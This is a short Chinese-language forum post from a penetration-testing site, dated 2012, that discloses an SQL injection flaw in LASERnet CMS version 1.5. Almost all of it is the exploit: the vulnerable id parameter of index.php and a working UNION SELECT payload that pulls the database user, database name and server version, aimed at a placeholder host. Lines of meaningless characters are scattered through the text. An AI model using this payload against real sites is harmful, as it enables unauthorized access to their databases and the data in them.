中国网络渗透测试联盟
标题:
LASERnet CMS Version 1.5 SQL注入漏洞
[打印本页]
作者:
admin
时间:
2012-9-10 20:47
标题:
LASERnet CMS Version 1.5 SQL注入漏洞
利用方法:
- |9 o: Z$ R( d# V4 g1 v* G
http://www.xxx.com/index.php?id=
[SQL]
J5 @7 T1 s- `% X) A' e f- h4 Z
Demo:
) m4 `8 R8 b; B: q" w3 _: K* e6 r
http://www.xxx.com/index.php?id=-1'
UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2